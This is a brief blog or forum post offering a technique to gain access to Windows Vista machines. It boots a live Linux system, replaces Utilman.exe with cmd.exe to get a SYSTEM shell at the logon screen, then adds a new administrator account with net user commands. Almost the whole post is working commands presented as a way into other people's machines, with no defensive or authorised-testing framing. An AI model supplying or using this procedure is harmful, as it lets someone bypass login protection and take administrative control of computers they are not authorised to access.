Hi Folks, today I wanna point out one of the plenty ways to gain access into Vista Boxes. Thank to some mailing list friends.
This way is clearly faster then brute forcing and boot-replacing passwords.
Boot into Backtrack and open a shell prompt:
cd /mnt (change directory to mounted drives)
ls (get the list of mounted drives)
cd sda1 (sda1 is the main hard drive)
cd Windows/ (change to the windows directory)
cd System32/ (change to the system directory)
mv Utilman.exe Utilman.old (backup original file)
cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
Once rebooted, at vista logon screen, Press Windows key + U
To invoke Utility Manager ( A.K.A. CMD.exe)
Cmd.exe will spawn with ‘System’ privileges.
c:\>net user S00perAdmin mypassword /add
c:\>net localgroup administrators S00perAdmin /add
Reboot and log in with your newly added Admin account